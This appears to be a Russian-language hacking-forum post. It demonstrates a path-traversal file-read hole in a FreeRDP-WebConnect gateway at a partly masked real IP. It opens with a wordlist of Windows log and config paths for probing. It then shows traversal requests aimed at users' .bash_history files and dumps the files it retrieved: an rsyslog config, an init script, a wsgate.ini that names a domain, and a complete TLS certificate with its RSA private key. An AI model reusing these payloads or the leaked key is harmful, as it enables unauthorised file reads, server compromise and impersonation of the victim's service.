c:/WINDOWS/system32/logfiles/SMTPSVC
c:/WINDOWS/system32/logfiles/SMTPSVC1
c:/WINDOWS/system32/logfiles/SMTPSVC2
c:/WINDOWS/system32/logfiles/SMTPSVC3
c:/WINDOWS/system32/logfiles/SMTPSVC4
c:/WINDOWS/system32/logfiles/SMTPSVC5
c:/WINNT/system32/logfiles/W3SVC/inetsvn1.log
c:/WINNT/system32/logfiles/W3SVC1/inetsvn1.log
c:/WINNT/system32/logfiles/W3SVC2/inetsvn1.log
c:/WINNT/system32/logfiles/W3SVC3/inetsvn1.log
c:/WINDOWS/system32/logfiles/W3SVC/inetsvn1.log
c:/WINDOWS/system32/logfiles/W3SVC1/inetsvn1.log
c:/WINDOWS/system32/logfiles/W3SVC2/inetsvn1.log
c:/WINDOWS/system32/logfiles/W3SVC3/inetsvn1.log
c:/Program Files/Apache Group/Apache/logs/access.log
c:/Program Files/Apache Group/Apache/logs/error.log
c:/Program Files/Apache Software Foundation/Apache2.2/logs/error.log
c:/Program Files/Apache Software Foundation/Apache2.2/logs/access.log
c:/Program Files/Apache Group/Apache/conf/httpd.conf
c:/Program Files/Apache Group/Apache2/conf/httpd.conf
c:/Program Files/xampp/apache/conf/apache.conf
c:/Program Files/xampp/apache/conf/apache2.conf
c:/Program Files/xampp/apache/conf/httpd.conf
c:/Program Files/Apache Group/Apache/apache.conf
c:/Program Files/Apache Group/Apache/conf/apache.conf
c:/Program Files/Apache Group/Apache2/conf/apache.conf
c:/Program Files/Apache Group/Apache/apache2.conf
c:/Program Files/Apache Group/Apache/conf/apache2.conf
c:/Program Files/Apache Group/Apache2/conf/apache2.conf
c:/Program Files/Apache Software Foundation/Apache2.2/conf/httpd.conf
c:/var/log/lighttpd/access.log
c:/Program Files/Vidalia Bundle/Polipo/polipo.conf
c:/WINNT/system32/logfiles/Firewall/pfirewall.log
c:/WINNT/system32/logfiles/Firewall/pfirewall.log.old
c:/WINDOWS/system32/logfiles/Firewall/pfirewall.log
c:/WINDOWS/system32/logfiles/Firewall/pfirewall.log.old
c:/WINDOWS/system32/drivers/etc/hosts
c:/WINDOWS/system32/drivers/etc/lmhosts.sam
c:/WINDOWS/system32/drivers/etc/networks
c:/WINDOWS/system32/drivers/etc/protocol
c:/WINDOWS/system32/drivers/etc/services
c:/boot.ini
c:/WINDOWS/Debug/NetSetup.LOG
c:/WINDOWS/comsetup.log
c:/WINDOWS/repair/setup.log
c:/WINDOWS/setupact.log
c:/WINDOWS/setupapi.log
c:/WINDOWS/setuperr.log
c:/WINDOWS/updspapi.log
c:/WINDOWS/wmsetup.log
c:/WINDOWS/WindowsUpdate.log
c:/WINDOWS/ODBC.INI
c:/WINDOWS/system32/Macromed/Flash/FlashInstall.log
c:/WINDOWS/system32/Macromed/Flash/install.log

 

[FantasticExploits]

То что вы видите не совсем то чем вам кажется:
/?../../../../../../home/skurkin/.bash_history
?../../../../../../home/artem/.bash_history
?../../../../../../home/casper/.bash_history
view-source:https://217.174.***.75:4430/?../../../../../../bin/bash

?=../../../../../../../../../..//etc/rsyslog.d/50-default.conf

#  Default rules for rsyslog.
#
#            For more information see rsyslog.conf(5) and /etc/rsyslog.conf

#
# First some standard log files.  Log by facility.
#
auth,authpriv.*            /var/log/auth.log
*.*;auth,authpriv.none        -/var/log/syslog
#cron.*                /var/log/cron.log
#daemon.*            -/var/log/daemon.log
kern.*                -/var/log/kern.log
#lpr.*                -/var/log/lpr.log
mail.*                -/var/log/mail.log
#user.*                -/var/log/user.log

#
# Logging for the mail system.  Split it up so that
# it is easy to write scripts to parse these files.
#
#mail.info            -/var/log/mail.info
#mail.warn            -/var/log/mail.warn
mail.err            /var/log/mail.err

#
# Logging for INN news system.
#
news.crit            /var/log/news/news.crit
news.err            /var/log/news/news.err
news.notice            -/var/log/news/news.notice

#
# Some "catch-all" log files.
#
#*.=debug;\
#    auth,authpriv.none;\
#    news.none;mail.none    -/var/log/debug
#*.=info;*.=notice;*.=warn;\
#    auth,authpriv.none;\
#    cron,daemon.none;\
#    mail,news.none        -/var/log/messages

#
# Emergencies are sent to everybody logged in.
#
*.emerg                                :omusrmsg:*

#
# I like to have messages displayed on the console, but only on a virtual
# console I usually leave idle.
#
#daemon,mail.*;\
#    news.=crit;news.=err;news.=notice;\
#    *.=debug;*.=info;\
#    *.=notice;*.=warn    /dev/tty8

# The named pipe /dev/xconsole is for the `xconsole' utility.  To use it,
# you must invoke `xconsole' with the `-file' option:
#
#    $ xconsole -file /dev/xconsole [...]
#
# NOTE: adjust the list below, or you'll go crazy if you have a reasonably
#      busy site..
#
daemon.*;mail.*;\
    news.err;\
    *.=debug;*.=info;\
    *.=notice;*.=warn    |/dev/xconsole

?=../../../../../../../../../..//etc/init.d/wsgate

#!/bin/sh
### BEGIN INIT INFO
# Provides:          wsgate
# Required-Start:    $network $local_fs
# Required-Stop:
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: WebSocket gateway for FreeRDP-WebConnect
# Description:       The WebSockets gateway for FreeRDP-WebConnect allws you
#                    to provide browser-based RDP sessions.
### END INIT INFO

# Author: Fritz Elfert <wsgate@fritz-elfert.de>

# PATH should only include /usr/ if it runs after the mountnfs.sh script
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin
DESC=wsgate             # Introduce a short description here
NAME=wsgate             # Introduce the short server's name here
DAEMON=/usr/local/sbin/wsgate # Introduce the server's location here
DAEMON_ARGS=""             # Arguments to run the daemon with
PIDFILE=/var/run/wsgate/$NAME.pid
SCRIPTNAME=/etc/init.d/$NAME

# Exit if the package is not installed
[ -x $DAEMON ] || exit 0

# Read configuration variable file if it is present
[ -r /etc/default/$NAME ] && . /etc/default/$NAME

# Load the VERBOSE setting and other rcS variables
. /lib/init/vars.sh

# Define LSB log_* functions.
# Depend on lsb-base (>= 3.0-6) to ensure that this file is present.
. /lib/lsb/init-functions

#
# Function that starts the daemon/service
#
do_start()
{
    # Make shure, that bindhelper has correct permissions
#    chown root.wsgate _pkglibexecdir_/bindhelper
#    chmod 04754 _pkglibexecdir_/bindhelper
    # Create /var/run/wsgate
    mkdir -p /var/run/wsgate
    chown wsgate.wsgate /var/run/wsgate
    # Generate cert if necessary
#    _pkglibexecdir_/keygen.sh

    # Return
    #   0 if daemon has been started
    #   1 if daemon was already running
    #   2 if daemon could not be started
    start-stop-daemon --start --quiet --chuid wsgate:wsgate --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \
        || return 1
    start-stop-daemon --start --quiet --chuid wsgate:wsgate --pidfile $PIDFILE --exec $DAEMON -- \
        -c /usr/local/etc/wsgate.ini $DAEMON_ARGS \
        || return 2
    # Add code here, if necessary, that waits for the process to be ready
    # to handle requests from services started subsequently which depend
    # on this one.  As a last resort, sleep for some time.
}

#
# Function that stops the daemon/service
#
do_stop()
{
    # Return
    #   0 if daemon has been stopped
    #   1 if daemon was already stopped
    #   2 if daemon could not be stopped
    #   other if a failure occurred
    start-stop-daemon --stop --quiet --retry=TERM/10/KILL/5 --pidfile $PIDFILE --name $NAME
    RETVAL="$?"
    [ "$RETVAL" = 2 ] && return 2
    # Wait for children to finish too if this is a daemon that forks
    # and if the daemon is only ever run from this initscript.
    # If the above conditions are not satisfied then add some other code
    # that waits for the process to drop all resources that could be
    # needed by services started subsequently.  A last resort is to
    # sleep for some time.
    start-stop-daemon --stop --quiet --oknodo --retry=9/10/KILL/5 --exec $DAEMON
    [ "$?" = 2 ] && return 2
    # Many daemons don't delete their pidfiles when they exit.
    rm -f $PIDFILE
    return "$RETVAL"
}

#
# Function that sends a SIGHUP to the daemon/service
#
do_reload() {
    #
    # If the daemon can reload its configuration without
    # restarting (for example, when it is sent a SIGHUP),
    # then implement that here.
    #
    start-stop-daemon --stop --signal 1 --quiet --pidfile $PIDFILE --name $NAME
    return 0
}

case "$1" in
    start)
        [ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESC " "$NAME"
        do_start
        case "$?" in
            0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
        2) [ "$VERBOSE" != no ] && log_end_msg 1 ;;
    esac
    ;;
stop)
    [ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME"
    do_stop
    case "$?" in
        0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
    2) [ "$VERBOSE" != no ] && log_end_msg 1 ;;
esac
;;
  status)
      status_of_proc "$DAEMON" "$NAME" && exit 0 || exit $?
      ;;
  #reload|force-reload)
      #
      # If do_reload() is not implemented then leave this commented out
      # and leave 'force-reload' as an alias for 'restart'.
      #
      #log_daemon_msg "Reloading $DESC" "$NAME"
      #do_reload
      #log_end_msg $?
      #;;
  restart|force-reload)
      #
      # If the "reload" option is implemented then remove the
      # 'force-reload' alias
      #
      log_daemon_msg "Restarting $DESC" "$NAME"
      do_stop
      case "$?" in
          0|1)
              do_start
              case "$?" in
                  0) log_end_msg 0 ;;
              1) log_end_msg 1 ;; # Old process is still running
          *) log_end_msg 1 ;; # Failed to start
      esac
      ;;
  *)
      # Failed to stop
      log_end_msg 1
      ;;
    esac
    ;;
*)
    #echo "Usage: $SCRIPTNAME {start|stop|restart|reload|force-reload}" >&2
    echo "Usage: $SCRIPTNAME {start|stop|status|restart|force-reload}" >&2
    exit 3
    ;;
esac

:

?=../../../../../../../../../..//usr/local/etc/wsgate.ini

[global]
# Enable debug logging and use uncompressed javascript.
# Possible values: true, false; Default: false
debug = false

# Enable core dumps
# Possible values: true, false; Default: false
enablecore = false

# Set non-SSL listener port. If omitted, no listener will be started.
port = 8000

# Set bind address of non-SSL listener.
#bindaddr = 127.0.0.1

# Set hostname (optional, for HTTP 1.1 host header comparison if running behind NAT)
# hostname = localhost

# Set syslog logging facility.
# Possible values: see syslog(3), without the LOG_ prefix
# Default: DAEMON.
# On Windows, this option is ignored and the looging is done via OutputDebugstring
logfacility = LOCAL6

# Set syslog mask.
# Possible values: DEBUG, INFO, NOTICE, WARNING, ERR, CRIT, ALERT, EMERG
# Multiple values: separate with the pipe sign "|"
# Default: all enabled
#logmask = WARN|ERR|INFO

# Enable daemon mode.
# Default: false, Currently ignored on Windows.
daemon = true

# Redirect permanently to https
# If listeners for both SSL and non-SSL are configured, enabling this,
# will answer all requests on the non-SSL port with a HTTP redirect response
# pointing to the SSL port.
#
# Default: false
redirect = true

# Path of daemon's PID file.
# Default: none => Don't create a PID-file
# Currently ignored on Windows
pidfile = /var/run/wsgate/wsgate.pid

[http]
# Set document root of web service. NO Default!
documentroot = /usr/local/share/wsgate

[ssl]
# Set SSL listener port. If omitted, no SSL listener will be started.
port = 4430

# Set bind address of non-SSL listener.
#bindaddr = 127.0.0.1

# Set server cert filename. This option is mandatory, if SSL an listener
# is enabled. It must contain a PEM encoded certificate and the corresponding
# private key.
#certfile = /usr/local/etc/wsgate/test.pem

# Set password of SSL private key.
#certpass = verysecret

#certfile = /etc/ssl/certs/wsgate.pem
certfile = /etc/ssl/wsgate/fullchainkey.pem
#certfile = /etc/ssl/acme/estt.ru/estt.ru.crt-bundle
[acl]
# The entries in this section limit the destination RDP hosts that can be
# connected to.

# The order directive, along with the allow and deny directives, controls a three-pass access
# control system. The first pass processes either all allow or all deny directives, as specified
# by the Order directive. The second pass parses the rest of the directives (deny or allow).
# The third pass applies to all requests which do not match either of the first two.
#
# Note that all allow and deny directives are processed, unlike a typical firewall, where only
# the first match is used. The last match is effective (also unlike a typical firewall).
# Additionally, the order in which lines appear in the configuration files is not significant.
# All allow lines are processed as one group, all deny lines are considered as another,
# and the default state is considered by itself.
#
# Possible values:
# allow,deny
# First, all allow directives are evaluated; at least one must match, or the request is rejected.
# Next, all deny directives are evaluated. If any matches, the request is rejected.
# Last, any requests which do not match an allow or a deny directive are denied by default.
#
# deny,allow
# First, all deny directives are evaluated; if any match, the request is denied unless it also
# matches an allow directive. Any requests which do not match any allow or deny directives
# are permitted.
#
# Default: deny,allow
#order = deny,allow

# Possible values: <hostname or IP-Address>, wildcard-characters: * and ?
#allow = 192.168.1.*

# Possible values: <hostname or IP-Address>, wildcard-characters: * and ?
#deny = *.freerdp.net

#certfile = /etc/ssl/certs/wsgate.pem
certfile = /etc/ssl/wsgate/fullchainkey.pem
[rdpoverride]
# The entries in this section can be used to override entries in the
# login form. If specified here, the user won't be able to modify
# those entries interactively anymore.

# Override the destination RDP host
#host = localhost

# Override the destination RDP port
#port = 3389

# Override the RDP username
#user = guest

# Override the RDP passwod
#pass = secret

# Override performance
# Possible values:
#  0 = LAN
#  1 = Broadband
#  2 = Modem
#performance = 0

# Disable wallpaper
#nowallpaper = true

# Disable full window dragging
nofullwindowdrag = true

# Disable menu animation
#nomenuanimation = true

# Disable theming
#notheming = true

# Disable TLS towards RDP backend
#notls = true

# Disable network level authentication
#nonla = true

# Override NTLM authentication version
# Possible values:
# 1 = NTLMv1
# 2 = NTLMv2
#forcentlm = 2


#certfile = /etc/pki/tls/certs/wsgate.pem
certfile = /etc/ssl/wsgate/fullchainkey.pem
[openstack]

#authurl = http://10.0.0.1:5000/v2.0
#username = admin
#password = secret
#tenantname = admin

#certfile = /etc/pki/tls/certs/wsgate.pem
certfile = /etc/ssl/wsgate/fullchainkey.pem
[hyperv]

# Credentials used to connect to the Hyper-V hosts when accessing
# OpenStack instances consoles

#hostusername = Administrator
#hostpassword = secret

читалка чистой воды
/?=../../../../../../../../../..//etc/ssl/wsgate/fullchainkey.pem

-----BEGIN CERTIFICATE-----
MIIE6DCCA9CgAwIBAgISA7I1ZCYcLlLsxaXFkfWb8Dm+MA0GCSqGSIb3DQEBCwUA
MDMxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQwwCgYDVQQD
EwNSMTAwHhcNMjQwNjE0MjIwMDQ0WhcNMjQwOTEyMjIwMDQzWjASMRAwDgYDVQQD
Ewdlc3R0LnJ1MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzUqcc0+j
iH3UC0PT6Qnb53CLqjnvfaQzvSVEXvxcOqk/ItGwbBTxqJuJRbzsHnXn/zkrQyUY
8TlP5wtrkz17QW+5i0b1pWGvBBrtklUMPvS61sfzOVs5QT6XF0nDxOUSFjPgKIAq
WgTxVwPRAiGPJ9ErfF7PVJVDTWiZ95ZGp7JLx5vylqcw7clixqXIVp/iS+qbRE4y
1xdOSmlo429sUjDQQFY1+B02t1CLzju0jPxxPiDO30nhxUjgZJA0ajFdmQSmf51t
ix7TTAQong+eKgrxAf+IvicgKUlzcAGo5qFK7C5ilBqF5vJhpMoU+u0exe+e9bXF
04F0GWtmLUB+rQIDAQABo4ICFTCCAhEwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQW
MBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRQ
0+A0tJ7L0cpRnWmZnh+nrT2/xDAfBgNVHSMEGDAWgBS7vMNHpeS8qcbDpHIMEI2i
NeHI6DBXBggrBgEFBQcBAQRLMEkwIgYIKwYBBQUHMAGGFmh0dHA6Ly9yMTAuby5s
ZW5jci5vcmcwIwYIKwYBBQUHMAKGF2h0dHA6Ly9yMTAuaS5sZW5jci5vcmcvMB0G
A1UdEQQWMBSCCSouZXN0dC5ydYIHZXN0dC5ydTATBgNVHSAEDDAKMAgGBmeBDAEC
ATCCAQMGCisGAQQB1nkCBAIEgfQEgfEA7wB2AD8XS0/XIkdYlB1lHIS+DRLtkDd/
H4Vq68G/KIXs+GRuAAABkBj7XJ0AAAQDAEcwRQIgRanfWIJL4OYiOmVoN+CFV6sI
QEbXzEbjizSXfhohJUoCIQDgLdxO4mUHI9MbxNXqxDS9X19DaAbiWMPU6iMKJop/
3QB1ABmYEHEJ8NZSLjCA0p4/ZLuDbijM+Q9Sju7fzko/FrTKAAABkBj7XaEAAAQD
AEYwRAIgd/ylVXpthZEnmlUARP56VIgOebGH4T3h/H4bCg+p8R4CIAQ2Rq01fcra
7q+t8fjc61u6Q/8H1l1YDjJGxQKGPTLzMA0GCSqGSIb3DQEBCwUAA4IBAQB9Fmy1
DB2k013djBtg4Q7cZtswMzAphCRex5bLctMhLpBebh6Tw+Z4M07aCX1lDdNwaS8m
8TkUylcqFYJLpL4QugTPaDFdGZkhuWhwY/CVi/U12ShGaKeaGob8yH4Vg3+CxTF0
nF29YLtdhdq50uXFsay57sNwoaQDF727pou71mnlp9nm4a/tLL872YJSrHsHJKej
S6Xq7reypeNDtQuOVexjE50uYebDRg5O5+/JGghbeCk3/02kmN/7aI+bpzRPW3db
7HaGDjEKe+NAe7i6mW6S9+zeJVGxORXi5ZNiJpXEfxViQKaHbuJDj52DhGlqXggs
kv4uRnaY4+nL0zuT
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAzUqcc0+jiH3UC0PT6Qnb53CLqjnvfaQzvSVEXvxcOqk/ItGw
bBTxqJuJRbzsHnXn/zkrQyUY8TlP5wtrkz17QW+5i0b1pWGvBBrtklUMPvS61sfz
OVs5QT6XF0nDxOUSFjPgKIAqWgTxVwPRAiGPJ9ErfF7PVJVDTWiZ95ZGp7JLx5vy
lqcw7clixqXIVp/iS+qbRE4y1xdOSmlo429sUjDQQFY1+B02t1CLzju0jPxxPiDO
30nhxUjgZJA0ajFdmQSmf51tix7TTAQong+eKgrxAf+IvicgKUlzcAGo5qFK7C5i
lBqF5vJhpMoU+u0exe+e9bXF04F0GWtmLUB+rQIDAQABAoIBAQCBQE6MU0HU99P/
W68Z8/keGD/25w8f/bgNiF8ppp2y2UhE9dyrz+vuii69V5sZ+oYcrLPOTJcNmVXz
U79hLr5hjqQ1SnHytDPq08Fr9lwFbzQLckxyejrsFyotoWW+m7Ltg6/IEBmaH66L
aH25Z8OoAAvu/ApxaKC9JfR6a4UEox1rLXatioD11JGJAT8JPxzIBhMZp9hWdo0T
yv8F2hnXKQowsmwicqVXkkRFiAIf5dEmH7g2/l8JC5n6WGkDNOMIZZ9CawLMsfuQ
fu4yB8VZhH5OtdbWIub2HyijrvoXPGTnF0vCKHBDPGra1q0K4g38skpBahjRLZ6G
r6webewJAoGBAPjMq3DzTIMtlIp9v7EKsRGajje0RjZKQ7Qpqx4p+hA0lhZGxgVH
fBzPun7dZE/ZF8ZxmVRZkBswaXIt/vQRy62C64K5ATAjs37QG1SJmshnHYoKt6pO
yEZJxDaEyw9oZUxAWDhyy/BEWw9tmNTkvbc67h/x90zzuTDcGv8KJajjAoGBANM7
mEIJyqM579UpFBn8d8SM3LX08ZoDH7Gj0GDhezfzDNbThwCzapeG7R8+nb7dEKYb
4FJKH7x8EHATI4CGRaj0s+z3mPGtOYVIomsSuCrdCSxtcjJ3M6/88Lc8lzax+Y8M
JnRsWjiZHoLmF+Ar7jRqTsU8eTsyKOCNfyQIAR8vAoGBAOCHlJCygPJBSDRTl5Mm
mvXQDVioEFUeYEtO72aha1MEog4ogLxy7sbxkNS857JHsPUdv8onqa1f20l3yQZq
qO1FoVSvsSrIjUx8cq2wIUeKB1Z0pZvEzWjhWXn6DWcyR3iw+Oy4bOPATI130t0O
MUgSnqOlshB4Q0Cc4qAXgDURAoGAPXpAzCeRZIQ+OynjgdSq/veIXSTXFF4IYWku
AqRdemEwwW17A0c0pLlOViOhQaWRbOb8GLceGXt6RUQstwFdUNk3bKZ7SwuBjDsh
mkwucbs3KkkITYvH7VaOsKXf1LljyrBcmNHYSFS4Ppy9Ii9m+rZeCqWZGxN0Nja4
ZEI4IV0Cf2ajq3TieDdNsF81/6vg/qSJow4kdBCFFG/64TYzKm0rSMAlGQ3kS1w6
jO2yVZZ0ZXcvExqdTsjD30dN4AZMegIED6XsZLiwYJaHX2LypZKt3etSmjMXVLUk
+bjbFXZ232no8ViBPIkxRmv0Fbx50ulqk6RyBjtbNABlXwIv3AA=
-----END RSA PRIVATE KEY-----

Cобственно, сам софт: view-source:https://217.174.***.75:4430/FreeRDP_Logo.png

FreeRDP-WebConnect/wsgate/webroot at master · FreeRDP/FreeRDP-WebConnect

A gateway for seamless access to your RDP-Sessions in any HTML5-compliant browser - FreeRDP/FreeRDP-WebConnect

github.com

Может что-то упустил.